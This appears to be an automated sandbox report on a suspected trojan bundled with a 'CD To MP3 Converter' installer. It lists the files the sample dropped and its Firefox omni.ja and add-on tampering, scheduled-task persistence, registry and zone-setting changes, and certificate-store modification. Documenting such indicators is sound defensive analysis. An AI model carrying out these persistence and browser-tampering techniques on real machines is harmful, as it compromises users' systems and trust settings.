File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File created C:\Program Files (x86)\UQtSSXvqU\ULWxyeQ.xml C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File created C:\Program Files (x86)\OJBbginKvssDnbEKbsR\ufPzTSh.dll C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File created C:\Program Files (x86)\UQtSSXvqU\dAvQqI.dll C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File created C:\Program Files (x86)\AMqhlrBDqRJU2\qdrADvEQqqeIm.dll C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File created C:\Program Files (x86)\AMqhlrBDqRJU2\oFBZBqb.xml C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
File created C:\Program Files (x86)\OJBbginKvssDnbEKbsR\cxgOVhs.xml C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\OcPshDNvhDnVmSv.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\MRTHivZIQsRdEanwm.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bEtnHIcecDUtXwQuWS.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\FPIEUdZLMYPzsiUNM.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b1167767-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b1167767-0000-0000-0000-d01200000000} C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3" C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe N/A
